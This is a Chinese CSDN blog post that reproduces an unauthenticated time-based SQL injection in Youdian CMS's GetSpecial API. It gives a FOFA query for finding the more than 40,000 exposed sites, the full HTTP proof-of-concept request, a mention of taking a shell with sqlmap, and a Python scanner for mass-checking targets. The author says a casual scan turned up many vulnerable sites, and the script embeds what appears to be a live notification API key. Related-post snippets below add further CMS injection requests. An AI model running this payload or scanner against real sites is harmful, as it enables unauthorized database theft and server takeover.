友点CMS GetSpecial SQL注入漏洞复现

最新推荐文章于 2024-05-11 14:30:00 发布
最新推荐文章于 2024-05-11 14:30:00 发布
阅读量753 收藏 11
点赞数 13
文章标签: sql 安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52514790/article/details/136218775
版权

友点CMS GetSpecial SQL注入漏洞复现

一、产品简介

友点CMS是一款高效且 灵活的网站管理系统,它为用户提供了简单易用的界面和丰富的功能。无论是企业还是个人,都能通过友点CMS快速搭建出专业且美观的网站。该系统支持多种内容类型和自定义模板,方便用户按需调整。同时,它具备强大的SEO功能,能提升网站在搜索引擎中的排名。友点CMS还支持多语言设置,适应国际化需求。总的来说,友点CMS是网站建设的理想选择,既高效又易用。

二、漏洞概述

友点CMS建站系统Getspecial 接口处存在SQL注入漏洞,未经身份认证的攻击者可以利用该漏洞获取系统数据库敏感信息,深入利用可获取服务器权限。

三、复现环境

FOFA:app=“友点建站-CMS”
在这里插入图片描述
我们可以看到有4万多个资产。

四、漏洞复现

POC

GET /index.php/api/GetSpecial?debug=1&ChannelID=1&IdList=1,1%29%20and%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29A HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

手动复现,我们这里设置的是延迟5秒
在这里插入图片描述
如果回显是200OK 和 5000毫秒左右,很大概率是存在漏洞。

利用sqlmap手动拿shell

在这里插入图片描述
自动化检测

在这里插入图片描述

随便扫描了一下,发现了一大堆的漏洞。

python相关代码

# Youdian_CMS_GetSpecial_SQL_vul_scan.py
#用友移动管理系统 getApp SQL注入漏洞
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from requests.exceptions import Timeout
import os
import urllib.parse
import urllib.request
import re
import time
import ssl
import urllib
from urllib.parse import urljoin, quote

def sc_send(text, desp='', key='[SENDKEY]'):
    postdata = urllib.parse.urlencode({'text': text, 'desp': desp}).encode('utf-8')
    urlserver = f'https://sctapi.ftqq.com/{key}.send'
    req = urllib.request.Request(urlserver, data=postdata, method='POST')
    with urllib.request.urlopen(req) as response:
        result = response.read().decode('utf-8')
    return result
key = "SCT202695TeKe1ATgRMke7f7jyrOOkH9GX"

def scan_Youdian_CMS_GetSpecial_SQL_vul(url, proxies, headers, append_to_output):
    if url.endswith("/"):
        path = "index.php/api/GetSpecial?debug=1&ChannelID=1&IdList=1,1%29%20and%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29A"
    else:
        path = "/index.php/api/GetSpecial?debug=1&ChannelID=1&IdList=1,1%29%20and%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29A"
    if not url.startswith('http://') and not url.startswith('https://'):
        url = 'http://' + url

    proxies = {
        'http': 'http://127.0.0.1:8080',
        'https': 'http://127.0.0.1:8080'
    }

    base_url = url + path
    #relative_path = "../appManage/getApp"
    #full_url = base_url + relative_path
    full_url = base_url

    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15",
        "Accept-Encoding": "gzip",
        "Connection": "close",
    }

    encodetext = url + path

    try:
        expected_time = 5  # 期望的回包时间,单位为秒
        start_time = time.time()
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        req = requests.get(encodetext, headers=headers, verify=False, timeout=15, proxies=proxies)
        res = req.text
        end_time = time.time()

        response_time = end_time - start_time
        if response_time >= expected_time:
            append_to_output(f"[+] {url} 存在友点CMS GetSpecial SQL注入漏洞!!!!", "red")
            # self.append_to_output(res, "yellow")
        else:
            append_to_output(f"[-] {url} 不存在友点CMS GetSpecial SQL注入漏洞", "green")
    except Timeout:
        append_to_output(f"[!] 请求超时,跳过URL: {url}", "yellow")
    except Exception as e:
        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):
            append_to_output(f"[-] {url} 证书校验错误或者证书被拒绝", "yellow")
        else:
            append_to_output(str(e), "yellow")
m0_52514790
关注
  • 13
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpcms头像上传漏洞引发的故事_友点cms image_upload(1)
afagagagaa的博客
04-10 985
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
友点 CMS V9.1 后台登录绕过 GetShell
Nginxx的博客
11-30 3201
友点 CMS V9.1 后台登录绕过 GetShell ,攻击者可无需任意权限即可登录后台并 getshell
【某CMS漏洞SQL注入漏洞分析
最新发布
qingkahui24689的博客
05-11 731
本文直接从一个入口的注入点展开,想找到一条合适的链路到GetShell的完整过程,但是遗憾的是,没能解决6位随机后台地址的问题,故实际利用起来的话,局限性还是有的,姑且称之为一次分享式的尝试性代码审计体验录吧。
youdiancms(友点cms)漏洞
weixin_50464560的博客
08-28 3403
前言 在近期的授权项目中,遇到了一个目标,使用了youdiancms,需要获取权限,进而进行审计,本次代码审计过程先发现SQL注入漏洞,继续审计发现getshell的漏洞,本文将本次审计过程书写下来,仅作为学习研究,请勿用作非法用途。 0x01 未授权SQL注入首先拿到源码一看,发现该系统是基于THINKPHP3开发的。 在App/Lib/Action/HomeBaseAction.class.php:16 cookie可控,然后赋值给了$this->_fromUser 跟踪一下$this->
(全新接口)友点cms某接口存在sql注入漏洞-0day漏洞
weixin_43167326的博客
02-22 558
友点CMS(YouDian CMS)是一款专业的内容管理系统,致力于为用户提供简单易用、功能丰富的网站建设解决方案。友点CMS具有灵活的模块化设计,支持自定义模板和插件开发,便于用户根据需求定制网站风格和功能。其强大的内容管理功能包括文章发布、多媒体管理、SEO优化等,同时提供用户管理、权限控制等管理功能,适用于各类网站类型,如企业官网、新闻资讯等。友点CMS通过简单高效的操作界面和扩展性强大的特点,帮助用户快速搭建优质网站。。
代码审计之youdiancms最新版getshell漏洞1
08-03
代码审计之youdiancms最新版getshell漏洞1
友点建站系统image_upload.php存在文件上传漏洞
qq_36334672的博客
04-03 354
友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,未经身份认证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
cms4j的article标签的使用.pdf
09-30
此外,还有 `getSource()`、`getADD_USER()`、`getSPECIAL_ID()`、`getSPECIAL_NAME()`、`getARTICLE_SHOW_MODE()`、`getHOMEPAGE_IMAGE()`、`getAUTHOR()`、`getARTICLE_CLASS_ID()`、`getCLASS_NAME()` 和 `...
cms4j的article标签的使用借鉴.pdf
12-25
CMS4J是一个内容管理系统,它的核心功能之一是文章管理。在CMS4J中,`<cms4j:article>` 标签是一个非常重要的组件,用于在网页中展示和操作文章。下面将详细介绍这个标签的使用及其相关的文章属性。 首先,`<cms4j:...
KesionCMSV9标签清单(new).doc
07-18
- {$GetSpecial}:显示专题入口。 - {$GetFriendLink}:显示友情链接入口。 - {$GetSiteUrl}:获取网站URL。 - {#GetFullDomain}:无论是否启用相对路径,始终返回完整的网站域名。 - {$GetInstallDir}:显示...
PhalconPHP 4.1.0
05-01
更改了Phalcon\Db\Adapter\*::getRawSQLStatement()以返回带有参数的完整SQL查询;更改了Phalcon\Filter::sanitize以在不存在过滤器时抛出E_USER_NOTICE;PHQL现在支持将扩展ASCII表中的任何可打印字符用于转义...
漏洞复现|youdiancms 9.5.0 版本 SQL注入 (CVE-2022-32300)
weixin_50791426的博客
11-26 3092
友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。易受攻击的URL为:/index.php/Admin/mail/viewLog?
CMS系统漏洞分析溯源(第7题)
weixin_47493074的博客
10-01 276
CMS系统漏洞分析溯源(第7题)
友点CMS V9.1 前台SQL注入
Nginxx的博客
11-18 3397
漏洞描述 友点 CMS V9.1 前台存在 sql 注入,攻击者可获取数据库内容 漏洞影响 youdiancms <=9.1 漏洞复现 GET /index.php/Channel/voteAdd HTTP/1.1 Host: www.youdiancms90.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,applicati
YouDianCMS友点系统任意文件上传漏洞
weixin_43567873的博客
03-04 320
YouDianCMS友点系统存在任意文件上传漏洞
某团购CMSSQL注入漏洞代码审计
蚁景网安学院
03-31 382
0x00 SQL注入漏洞:简单介绍一下SQL语句:通俗来理解就是开发者盲目相信用户,没有严格检查用户输入,导致用户可以输入恶意参数进入程序逻辑,最终拼接恶意参数改变原本的SQL语句逻辑,...
74cms3.0安装以及cmsSQL注入漏洞详解
Gjqhs的博客
03-08 1480
下载解压到www目录并开启低版本PHP服务 http://127.0.0.1/74cms3.0/install/index.php Error:Can‘t select MySQL database(74cms3.0)!问题解决 无脑确定 按照提示配置,不知道填啥就写root,邮箱随便写一个@qq.com 后台 前台 注册 ...
Victor CMS SQL注入漏洞(CVE-2022-28060)
千寻的博客
11-28 1551
Victor CMS v1.0 /includes/login.php 存在sql注入
审计一套CMS中的SQL注入
weixin_30790841的博客
08-07 321
漏洞分为系统漏洞和应用漏洞,系统漏洞以二进制漏洞为代表,其挖掘难度较高需要对反汇编和操作系统原理深入理解,而除了系统漏洞以外还有一些应用漏洞,包括不限MySQL,Apache,为代表的Web漏洞,这里我们就挖掘PHP代码层面的漏洞漏洞的挖掘也分为,点对点挖掘漏洞,和分散式挖掘漏洞,这我们主要使用点对点挖掘,在挖掘是我们需要找一些关键字,漏洞本身就是两个条件,可控的函数,和可控的变量...
熊海cms v1.0 SQL注入漏洞复现
weixin_46801402的博客
07-29 3105
熊海CMS是一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统,熊海CMS存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值